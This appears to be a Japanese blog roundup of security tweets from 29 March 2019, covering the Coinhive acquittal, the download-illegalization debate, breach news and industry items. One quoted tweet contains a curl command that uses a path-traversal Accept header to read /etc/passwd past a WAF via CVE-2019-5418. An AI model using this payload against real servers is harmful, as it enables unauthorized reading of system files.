2019年3月29日のtwitterセキュリティクラスタ

無罪になったコインハイブ事件の続き

おそらく文化庁としては主観要件でもって問題ないとの認識なのだろうが、少し視野が狭いのではないか。
ウイルス罪で立法の主旨に反する摘発が行われている現状を黙認する一方、もう一方で法案の不備での摘発を心配する国民はおかしい、誤解だ、などと言ってのける政府に不安を抱くのは自然だろう。 https://t.co/kk6MZpShrD

ポイントはそこ。特に刑事罰について運用するのは警察、検察で、逐条解説を通じて起草者や内閣法制局の見解は伝わると期待するけど、所詮そこは期待の範疇。下手な解釈を許さないよう、条文の書きぶりに配慮するのは当然だと思います。無論、読んだ一般人が変に萎縮的に読まれないようにするためにも。 twitter.com/kazukikusunoki…

適当立法を勝手解釈で運用しだすと、過去にそういった運用があったという事実=前例が、法の代わりとして機能してしまうのがまたおっかないんですよね。
ウイルス罪では勝手解釈に略式起訴で、まともな司法判断を受けないまま前例踏襲の検挙を続けていて、悪例も前例、適当立法恐るべしです。 twitter.com/sakaima/status…

裁判官に技術的背景や問題点をわかってもらうために色々とがんばったので見てほしい pic.twitter.com/LJHZLkVASc

大変よくできている番組だった。モロさんも言うべきところで怯まずちゃんと述べているの凄い。
abema.tv/channels/abema…

ウェブサイトに他人のパソコンのCPUを使って仮想通貨を採掘するプログラム「コインハイブ」を埋め込んでいたして不正指令電磁的記録保管の罪に問われた「モロ氏」に対し横浜地裁は3月27日無罪を言い渡しました。

FACTAは2018年8月号で乱暴な摘発に警笛を鳴らしていました。
facta.co.jp/article/201808…

前から疑問に思ってた動画自動再生OFFを突き抜けてくる自動再生動画広告なるほどになった
※動画フレームを並べたjpgをキャンバスに置いて1フレームづつJSで表示してる pic.twitter.com/WQGqz5Xn3y

そうそう、firefoxが動画自動再生を禁止してない理由がこれで、動画自動再生を禁止した際に回避策としてパラパラ漫画をされると、その方が回線にも計算資源にも余計に負荷が高い。動画自動再生は邪悪だが、色々ある邪悪の中ではまだしもクソ度が低めである。 twitter.com/clworld/status…

コインハイブ事件の無罪判決。安堵の声が上がる一方、石井徹哉教授は「相変わらず問題の根本的な解決にはなっておらず、今後もセキュリティを侵害しないプログラムについて、今回の件と同様の問題は起こる可能性はあるといえる」と指摘します。

bengo4.com/c_23/n_9448/

CoinHiveで有罪判決を受けてしまった人は、やっぱり、もう非常上告しか手は無いのですね。しかしこれだけの量の非常上告をこのような形で行うのは、史上初でしょうか? (スピード違反じゃないのにスピード違反だと思い込まれてた道路で、大量の非常上告が発生した事件はあった) bengo4.com/c_23/n_9448/

仮想通貨獲得のプログラム「ウイルスではない」と 無罪判決 ino.to/1ZRFiAb

誤解かもですが「パソコンへの影響が軽微~」という判決に?マークです。パソコン利用者は、高い演算能力を求めて高価なCPUにします。無断でCPUに演算させるのは、パソコン利用者の金銭を盗んだともいえるのでは。

その他に気になったことはこのあたり。

新事実が発覚、「ダウンロード違法化潰し」は漫画家の総意ではなかった – 岸博幸の政策ウォッチ bit.ly/2HKkJWT

前回の文章が岸博幸氏にしては穏当と思ったら本領発揮。過去連載見ればわかる通り、この方は常にコンテンツ企業の代弁者であって、クリエイターの味方ではない。『新事実が発覚、「ダウンロード違法化潰し」は漫画家の総意ではなかった』diamond.jp/articles/-/198…

「一部の権利者の意向によってわが国の法的措置の内容が後退することがあってはならないと考えます」というCODA代表理事の文章は、今回の「漫画家の総意ではない」と見事に繋がるわけですが…coda-cj.jp/news/detail.ph…

日本漫画家協会の声明がマンガ家の総意でないとかおっしゃるなら、それまで前例なく、いきなり代表理事個人名で、ものすごい文章ぶっ放して、霞ヶ関方面すらもモニョらせたアレは、やっぱりCODAの会員であるコンテンツ企業の総意ではないということになるわけでだが、それで良いのか?

おかしいな。出版社はそこまでしてくれるなと発言しているし、漫画家はこの案件は一般の方を困らせる、誰も得をしないと嘆いている。漫画家協会はそれら全ての代弁をしてくれた。感謝している。漫画家は政治に疎い?違うよ、勇気と時間が無いから発言を控えているんだよ。 diamond.jp/articles/-/198…

岸博幸氏にはつまり、「声明の体裁すら覚束ず、代表個人名で出しちゃったCODAこそがコンテンツ企業各社の総意であるとアピールしろ!」という仕事がどこかから振ってきたのでしょか。憂慮の声明を出した出版業界とは明らかに足並みが揃ってないですね。 twitter.com/nmisaki/status…

@yamadashoji ダウンロード違法化反対運動に対してネガティブキャンペーン的な記事が掲載されました。かなりCODAや文化庁寄りですね。筆者がCODAに役員を輩出してるエイベックス顧問の岸博幸氏だからかもしれません。diamond.jp/articles/-/198…

Azure Storage の Azure AD ベースのアクセス制御が GA!RBAC を用いたアクセス制御や多要素認証、PIM を用いた一時的な権限付与などが利用可能に。 azure.microsoft.com/blog/azure-sto…

>2019年3月28日に、「Web Application Firewall 読本」の補足資料として、「Web Application Firewallの導入に向けた検討項目」を公開しました。 twitter.com/matthew_sec/st…

「メルアド has been hacked, change your password ASAP」の件名で、仮想通貨を要求するsextortion(性的脅迫) (英語版)、本日も勢いよく送ってきてます。
ビットコインアドレスがバラバラで、下記5例の釣果は0の模様。
サイバー犯罪者が私腹を肥やすだけなので、絶対に要求には応じないで。 pic.twitter.com/YUAcV7nH7V

IIJmioのセキュリティ対策(不正ログイン対策)として、3/28よりIIJmioのWebでログインを行った際に、登録メールアドレスに「[IIJmio] ログインのお知らせ」というメールをお送りするようにしました。公式案内は以下をご覧ください。
iijmio.jp/info/iij/15537…

Want to bypass WAF when exploiting CVE-2019-5418 ? curl -H ‘Accept: ../../../../../../e*c/p*s*d{{‘ http://server/…

Toyota announces second security breach in the last five weeks zd.net/2JOg9bS by @campuscodi

講談社社員、数百人分の個人情報紛失 – 産経ニュース sankei.com/life/news/1903…

【予告】スマートフォンなどでサイバー犯罪に遭わないように、正義感が強いが少々ドジなところがご愛嬌の「サイバー官」とサイバー犯罪を嗅ぎ分けるブルドッグ型AIロボットの「サイバーAI犬」が手口や基本的な対策などをわかりやすく解説した短編アニメ映像を近日公開予定!お楽しみに! pic.twitter.com/1tpMQ6oV1b

新しく借りたサーヴァーに前ユーザーの改ざんが残る? 「ベアメタルクラウド」の落とし穴 wired.jp/2019/03/29/dar… #最新記事

拾得物盗んだ県警職員を懲戒免職 転売や不正アクセスも kanaloco.jp/article/entry-…

県警監察官室によると、川崎署の職員は2016年9月、県警のシステム管理者のIDやパスワードを使って、県警内の通信ネットワークに不正アクセスした疑いがある。

このトヨタからの310万件の顧客情報流出のニュース www3.nhk.or.jp/news/html/2019… に関連してベトナムの APT32 (OceanLotus) を示唆する海外ニュースがあったけどちょっとまだ早いんじゃないかなと思いました

解説「ゼロトラスト」シフト:脱“境界セキュリティ”が進む2つの動き japan.zdnet.com/article/351345…

富士通、韓国国内線で手のひら静脈認証を導入–空港内の混雑緩和へ japan.zdnet.com/article/351349…

ホワイトハッカーとセキュリティ機器の判定一致は36%–NTT Comが検証 japan.zdnet.com/article/351349…

自宅セキュリティ研究所

自宅セキュリティ研究所 wrote 2714 posts

Tags

Post navigation


コメントを残す

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>